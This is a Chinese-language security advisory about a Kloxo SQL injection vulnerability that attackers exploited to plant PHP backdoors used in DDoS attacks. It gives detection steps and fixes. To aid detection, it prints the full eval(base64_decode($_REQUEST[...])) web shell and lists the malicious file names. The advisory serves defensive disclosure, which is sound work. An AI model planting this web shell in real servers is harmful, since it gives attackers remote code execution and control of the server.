Kloxo SQL 植入漏洞

最後更新 2014年02月24日 18:24 發佈日期: 2014年02月24日 1088 觀看次數

風險: 高度風險

High Risk

類型: 伺服器 - 其他伺服器

類型: 其他伺服器

在 Kloxo 發現漏洞,惡意使用者可利用漏洞全面控制伺服器及在遠端執行任意程式碼。

 

根據 vpsBoard 論壇 (https://vpsboard.com/topic/3384-kloxo-installations-compromised/),攻擊者利用 Kloxo 的 SQL 植入漏洞,隨機在 /home/kloxo/httpd/default 下的 PHP 檔案植入惡意程式碼。成功植入後,該惡意程式碼能解析及執行任何以參數方式傳遞的程式碼。

 

該漏洞曾被廣泛利用,針對美國的銀行進行分散式阻斷服務攻擊。HKCERT 曾收到報告指香港的伺服器亦被利用作攻擊。

 

該漏洞的攻擊程式碼已被公開。

影響

  • 遠端執行程式碼

受影響之系統或技術

  • Kloxo 6.1.13 之前的版本

解決方案

如何證實伺服器受到控制

  • 在 /home/kloxo/httpd/default 下,搜尋任何被植入以下程式碼的檔案:
    <?php
    set_time_limit(0);error_reporting(NULL);
    if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
    else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
    ?>
    若有任何發現,可從你的備份中回復原本的檔案或更新 Kloxo。
  • 在你的伺服器中搜尋以下任何檔案:
    conzx.php fakzx.php indzx.php resuzx.php modzx.php genezx.php
    由於這些檔案會被利用作發動分散式阻斷服務攻擊,若有任何發現,請予以移除。

 

在安裝軟體之前,請先瀏覽軟體供應商之網站,以獲得更多詳細資料。

 

若你未能安裝更新,請考慮以下措施

  • 不要使用預設的管理埠 (7777 及 7778)。
  • 使用其他寄存控制台應用程式。

漏洞識別碼

  • 暫無 CVE 可提供

資料來源

相關連結

分享至

上一頁

Adobe Flash Player 遠端執行程式碼漏洞

2014年02月21日 1904 觀看次數

下一頁

Linksys E-Series 路由器多個漏洞

2014年02月25日 1046 觀看次數

我們使用cookie為您提供最佳的網站體驗。繼續瀏覽本網站,即表示您同意使用cookie。有關更多詳細信息,請閱讀我們的Cookie政策。

隱私政策